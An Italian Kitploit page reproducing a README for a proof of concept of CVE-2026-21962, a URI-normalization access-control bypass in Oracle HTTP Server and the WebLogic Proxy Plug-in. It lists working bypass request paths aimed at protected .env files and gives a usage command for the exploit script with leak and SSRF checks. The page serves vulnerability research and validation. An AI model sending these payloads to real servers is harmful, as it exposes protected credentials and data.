Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21962 — PoC verificato e analisi per CVE-2026-21962, un bypass del controllo degli accessi in Oracle HTTP Server/WebLogic Proxy Plug-in tramite un'incoerenza nella normalizzazione degli URI, con script di exploit e prove. | Kitploit
Strumenti/GitHubGitHub/zeetee1235/cve-2026-21962
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingRed Teaming
GitHubzeetee1235/cve-2026-21962

CVE-2026-21962

PoC verificato e analisi per CVE-2026-21962, un bypass del controllo degli accessi in Oracle HTTP Server/WebLogic Proxy Plug-in tramite un'incoerenza nella normalizzazione degli URI, con script di exploit e prove.

Vedi Repository
12h 22m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-21962 — Oracle HTTP Server / WebLogic Server Proxy Plug-in

Bypass del controllo accessi tramite inconsistenza nella normalizzazione URI

Un exploit e un'analisi riprodotti in modo indipendente per CVE-2026-21962 (controllo accessi improprio, CVSS 10.0) in Oracle HTTP Server / il Proxy Plug-in di Oracle WebLogic Server per Apache HTTP Server.

Stato: verificato contro OHS 12.2.1.4.0 e 14.1.2.0.0 live che fungono da front-end per WebLogic Server 12.2.1.4.


1. TL;DR

Il front-end (OHS + mod_wl_ohs) e il backend (WebLogic) normalizzano ..; in modo diverso. Una richiesta come:

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1

bypassa una regola di protezione front-end <Location /internal-admin> perché OHS non comprime ..;, mentre WebLogic ( = parametro di percorso servlet, = parent). Il backend serve quindi il percorso protetto. Risultato: (CWE-284).

lo fa
;
..
bypass del controllo accessi front-end

Vedi analysis/root-cause.md.

2. Ambito — esattamente cosa è stato verificato

Verificato (riprodotto)

  • OHS 12.2.1.4.0 + mod_wl_ohs (WLSPLUGINS_12.2.1.4.0_LINUX.X64_190912.1848) come front-end per WebLogic Server 12.2.1.4.
  • OHS 14.1.2.0.0 + mod_wl_ohs (WLSPLUGINS_14.1.2.0.0_LINUX.X64_250908.1137) come front-end per WebLogic Server 12.2.1.4.
  • Varianti di bypass (tutte espongono il .env protetto):
    • /foo/..;/internal-admin/cont/.env
    • /foo/..%3b/internal-admin/cont/.env
    • /foo/..;jsessionid=xxxx/internal-admin/cont/.env
    • /foo/%2e%2e;/internal-admin/cont/.env
  • Il percorso diretto (canonico) è bloccato (404), a prova del bypass.
  • La risposta contiene header X-ORACLE-DMS-*, a prova che si tratta di una risposta genuina del backend (WebLogic).
  • Il log di accesso del backend mostra la richiesta normalizzata a /internal-admin/... (GET /foo/../internal-admin/... 200).
  • A/B equivalente alla patch: con la normalizzazione front-end corretta, la stessa richiesta viene bloccata (vedi evidence/).
  • Gli URI "RCE" della famiglia Ashwesker restituiscono 404 sulla stessa distribuzione vulnerabile (vedi poc-factcheck.md).

NON verificato

  • WebLogic Server Proxy Plug-in per IIS (isapi_wl, affetto in 12.2.1.4.0). Ci si aspetta lo stesso meccanismo (risoluzione del percorso servlet sul backend), ma non è stato riprodotto su Windows.
  • I binari ufficiali patchati (protetti da SSO Oracle). L'analisi della patch è un diff binario di due build vulnerabili pubbliche + una dimostrazione equivalente alla patch (analysis/patch-analysis.md).
  • Qualsiasi catena RCE oltre la divulgazione di dati / SSRF. Questo progetto dimostra un bypass del controllo accessi con perdita di dati e uno scenario di preparazione SSRF; non dimostra l'esecuzione di comandi del sistema operativo, e nessun PoC pubblico credibile lo fa.

3. Ambiente

ruolocomponenteversione
front-endOracle HTTP Server12.2.1.4.0 / 14.1.2.0.0
plug-inmod_wl_ohs12.2.1.4 (190912) / 14.1.2 (250908)
backendOracle WebLogic Server12.2.1.4
app protetta/internal-admin/cont/.env (credenziali fittizie)—

Configurazione front-end utilizzata (trigger minimo):

root@kitploit:~
<Location /foo>
  WLSRequest ON
  WebLogicCluster <backend>:7101
</Location>

<Location /internal-admin>
  ErrorDocument 404 'OHS: Disallowed location'
  Redirect 404 /
</Location>

4. Vulnerabile vs Patchato (A/B)

Stessa richiesta, stesso front-end, stesso backend — solo la gestione di ..; da parte del front-end è modificata.

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1
distribuzioneHTTPespostobackend raggiunto
vulnerabile200sì (credenziali .env)sì (X-ORACLE-DMS-*)
patchato (normalizzazione corretta)404nono

Evidenza grezza (richiesta / risposta / log del server):

  • evidence/vulnerable/
  • evidence/patched/

5. Utilizzo

root@kitploit:~
python3 exploit/CVE-2026-21962.py -t http://TARGET:PORT --auto-proxy --check ALL
  • --auto-proxy : rileva automaticamente il prefisso proxy WLSRequest (es. /foo).
  • -c : percorso protetto sul backend (default internal-admin/cont/.env).
  • --check LEAK|SSRF|ALL.
  • La verifica della risposta del backend usa gli header X-ORACLE-DMS-*; la richiesta di controllo (diretta) deve essere bloccata affinché il verdetto sia positivo.

Vedi exploit/README.md per i dettagli. Utilizza solo contro sistemi su cui sei autorizzato a testare.

6. File

root@kitploit:~
.
├── README.md                     questo file
├── exploit/
│   ├── CVE-2026-21962.py         PoC verificato (controllo di perdita deterministico)
│   └── README.md
├── evidence/
│   ├── vulnerable/               request.txt, response.txt, server-log.txt
│   └── patched/                  request.txt, response.txt, server-log.txt
├── analysis/
│   ├── root-cause.md             analisi della mancata corrispondenza di normalizzazione
│   └── patch-analysis.md         diff binario + A/B equivalente alla patch
└── poc-factcheck.md              tabella di credibilità dei PoC pubblici + dettaglio per PoC

Strumenti di rilevamento / mappatura attivi (fingerprint, sonda cieca, mappa di normalizzazione) che funzionano SENZA conoscere un percorso protetto sono mantenuti separatamente in ../../probe/.

Integrità

  • exploit/CVE-2026-21962.py SHA-256: 20f050abf2a8f0e5b644667c1f7f87bcd9b2448d03b8d5d89bd6ea71b6b4f75a

7. Riferimenti

  • Oracle CPU (gen 2026): https://www.oracle.com/security-alerts/cpujan2026.html
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21962
  • CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21962
  • Ricercatore originale: https://github.com/gregk4sec/cve-2026-21962

8. Uso responsabile

Questo materiale è fornito per la ricerca sulle vulnerabilità e la validazione difensiva. Non utilizzarlo contro sistemi senza autorizzazione. Il contenuto .env nelle evidenze è fittizio; non sono incluse credenziali reali.

Scarica lo strumento